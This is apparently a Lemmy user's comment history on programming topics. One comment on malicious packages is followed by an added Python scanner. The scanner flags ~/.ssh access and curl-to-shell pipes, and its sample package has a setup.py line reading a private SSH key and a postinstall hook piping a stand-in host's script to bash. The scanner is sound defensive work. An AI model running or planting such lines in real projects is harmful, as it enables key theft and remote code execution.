CmdrKeen
@CmdrKeen@lemmy.today
- Comment on SSH keys stolen by stream of malicious PyPI and npm packages 1 year ago:
IDK, virus scanners and malware detectors could do these things before AI.
You could search for stuff like directly accessing the `~.ssh` directory, or any invocations of `wget` or `curl` to download external scripts and run them through an interpreter and flag those for closer inspection.
If you want to get fancier, automate installing packages in an isolated environment (like a container or VM) and keep track of every file system access and network request they make.
Sure, eventually they’ll figure out ways to obfuscate those things, too, but it could at least prevent people from doing things in such blatantly obvious ways.
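The static checks described in this comment, sketched as an added example (not part of the original comment and not any real scanner's code). The regex patterns, function names and the sample package contents are assumptions constructed for illustration.

```python
import json
import re

# Heuristics named in the comment; the exact patterns are this example's assumptions.
RULES = {
    "ssh-key-access": re.compile(r"(?<!\w)\.ssh(?!\w)|\bid_(?:rsa|dsa|ecdsa|ed25519)\b"),
    "download-piped-to-interpreter": re.compile(
        r"\b(?:curl|wget)\b[^\n;]*\|\s*(?:sudo\s+)?"
        r"(?:(?:ba|z|da)?sh|python[\d.]*|node|perl|ruby)\b"),
}
NPM_HOOKS = ("preinstall", "install", "postinstall")  # run automatically by npm install

def scan_text(name, text):
    """Return (file, line_no, rule) for every line that matches a rule."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, pat in RULES.items():
            if pat.search(line):
                hits.append((name, no, rule))
    return hits

def scan_package(files):
    """files: {relative path: text}. Scans sources plus npm install hooks."""
    hits = []
    for name, text in sorted(files.items()):
        if not name.endswith("package.json"):
            hits.extend(scan_text(name, text))
            continue
        try:
            scripts = dict(json.loads(text).get("scripts") or {})
        except (ValueError, AttributeError, TypeError):
            # A manifest that cannot be parsed is itself worth a closer look.
            hits.append((name, 0, "unparseable-manifest"))
            continue
        for hook in NPM_HOOKS:
            for _, _, rule in scan_text(name, str(scripts.get(hook, ""))):
                hits.append((f"{name}:{hook}", 0, rule))
    return hits

# Constructed sample package contents (not taken from any real package).
SAMPLE = {
    "setup.py": "import os\nfrom setuptools import setup\n"
                "key = open(os.path.expanduser('~/.ssh/id_rsa')).read()\n"
                "setup(name='example')\n",
    "package.json": '{"scripts": {"postinstall": '
                    '"curl -s https://example.invalid/i.sh | bash", "test": "jest"}}',
    "lib/util.py": "def add(a, b):\n    return a + b\n",
}

if __name__ == "__main__":
    for hit in scan_package(SAMPLE):
        print(hit)
```

Hits are only candidates for closer inspection: a legitimate SSH library will trip the first rule, and obfuscated code will trip neither, which is where the sandboxed install with file and network tracing comes in.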
- Comment on Client did not pay? 1 year ago:
“Abandon all hope, ye who enter here.”
- Comment on On developer dogma #3 : Never ship on Fridays 1 year ago:
As someone who has experienced burnout before: that’s exactly what it looks like.
- Comment on GitHub Desktop or Git CLI? 1 year ago:
GitLens?
- Comment on Is jQuery still the go-to JS helper library? 1 year ago:
You mean these? Does it use them internally, because I haven’t really seen them in any Svelte code.
If so, what does it matter what the compiler does in order to make your code work, so long as it’s legal? It’s perfectly valid JS, that’s all that counts.
I wouldn’t say Svelte is weird as much as it’s different. That’s the whole point after all. Instead of adding a bunch of library bloat and keeping an entire copy of the DOM to constantly compare to and derive changes from, it compiles your components down to native JS that manipulates the DOM directly, like you would by hand. Except of course the compiler uses different ways to achieve that than you would, but that’s because it doesn’t have to care about readability, as long as it creates valid and efficient code.
- Comment on Is jQuery still the go-to JS helper library? 1 year ago:
Both are weird compared to Svelte.
- Comment on What operating system and tools should a beginner use to learn programming? 1 year ago:
It really doesn’t matter. Literally a Raspberry Pi will do for a beginner.
- Comment on To A Man With `jq`, Everything Looks Like JSON 1 year ago:
And `jc`, apparently: programming.dev/post/7063427
- Comment on Need a rust version too. 1 year ago:
require 'castle'
begin
  Castle.attack
rescue Princess => p
  puts "Done"
end
- Comment on Need a rust version too. 1 year ago:
from Castle import Princess
Done
- Comment on what's the difference? 1 year ago:
Yes, but mostly because the general population likely isn’t super familiar with Bittorrent and PirateBay.
A better, yet similarly correct explanation would be to say GitHub is to Git what GMail is to email.
This also doesn’t confuse protocol and content, and it doesn’t require knowledge of piracy.
- Comment on How do I convince my company to add tests for FE? 1 year ago:
How do you calculate those numbers though?
It’s not like your colleagues will be keeping track of how much time they’ve wasted writing ineffective code. If anything, they’ll try to hide that by arbitrarily inflating sprint points etc.
I’ve worked in environments like that and the issue almost always isn’t that people wouldn’t LIKE it if there were tests, it’s that they
- Don’t want to have to learn something new in order to do the same job they’re already comfortable with
- Are worried that if they convince management to let them invest X amount of time into doing something that will improve productivity, they’ll be expected to be more productive in the future
And of course, all of this for no extra money. Unless you work at a place where management prioritizes developer happiness over how many sprint points the team can knock out every week (and those are rare), the sad truth is that it’ll likely be about as popular as leftover food growing mold in the community fridge.